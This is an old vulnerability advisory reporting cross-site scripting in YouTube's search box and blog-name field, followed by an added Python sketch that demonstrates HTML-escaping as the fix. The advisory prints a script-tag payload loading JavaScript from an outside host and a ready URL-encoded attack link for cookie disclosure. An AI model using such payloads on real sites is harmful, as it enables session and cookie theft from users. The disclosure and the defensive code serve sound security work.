youtube.txt

2006-06-26T00:00:00
ID PACKETSTORM:47649
Type packetstorm
Reporter Luny
Modified 2006-06-26T00:00:00

Description

                                        
`Youtube.com  
  
Homepage:  
http://www.youtube.com  
  
Affected files:  
  
* Search box input  
* Adding a new blog:  
- Blog name  
  
  
XSS Vuln with cookie disclosure via search box:  
  
Data isn't sanitized when using the search box. For PoC input:  
  
<script src=http://www.youfucktard.com/xss.js></script>  
  
PoC link:  
http://www.youtube.com/results?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E&search_type=search_videos&search=Search  
  
Screenshots:  
http://www.youfucktard.com/xsp/youtube1.jpg  
------------------------------------------  
  
XSS vuln via blog name input box:  
  
Now, YouTube allows you to add a blog to your profile, and one of the places they let you merge a blog is from blogspot.com. I audited them a few days ago, and since you can use HTML in your blog's name, amongst other things, this is dangerous for bringing it into YouTube.  
  
Screenshots:  
  
http://www.youfucktard.com/xsp/youtube1.jpg  
http://www.youfucktard.com/xsp/youtube2.jpg  
http://www.youfucktard.com/xsp/youtube3.jpg  
`
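
Added example (not part of the original advisory, and not YouTube's code): the search-box issue is fixed by HTML-encoding the search term where it is reflected. The sketch decodes a request modelled on the PoC link, renders each `search` value with and without escaping, and parses the output to see whether a `script` element survives; the host `xss.example` and all function names are constructed placeholders.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Constructed request modelled on the advisory's PoC link (placeholder host).
POC_URL = ("http://www.youtube.com/results?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2F"
           "xss.example%2Fxss.js%3E%3C%2FSCRIPT%3E"
           "&search_type=search_videos&search=Search")

def search_terms(url):
    """Decode every value of 'search'; the PoC link carries the key twice."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("search", [])

def render_unsafe(term):
    # Behaviour the advisory reports: the term is reflected into HTML as-is.
    return "<h1>Results for " + term + "</h1>"

def render_safe(term):
    # Output encoding for an HTML text context: < > & " ' become entities.
    return "<h1>Results for " + html.escape(term, quote=True) + "</h1>"

class TagCollector(HTMLParser):
    """Records the start tags a parser would actually build from the markup."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def tags_in(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def audit(url):
    """For each search value: (term, script element unescaped?, escaped?)."""
    def has_script(markup):
        return any(tag == "script" for tag, _ in tags_in(markup))
    return [(t, has_script(render_unsafe(t)), has_script(render_safe(t)))
            for t in search_terms(url)]

if __name__ == "__main__":
    for term, unsafe, safe in audit(POC_URL):
        print(f"{term!r}: script when reflected raw={unsafe}, when escaped={safe}")
```

Because the key is repeated, every value a template might reflect has to pass through the same encoding, not just the first one parsed.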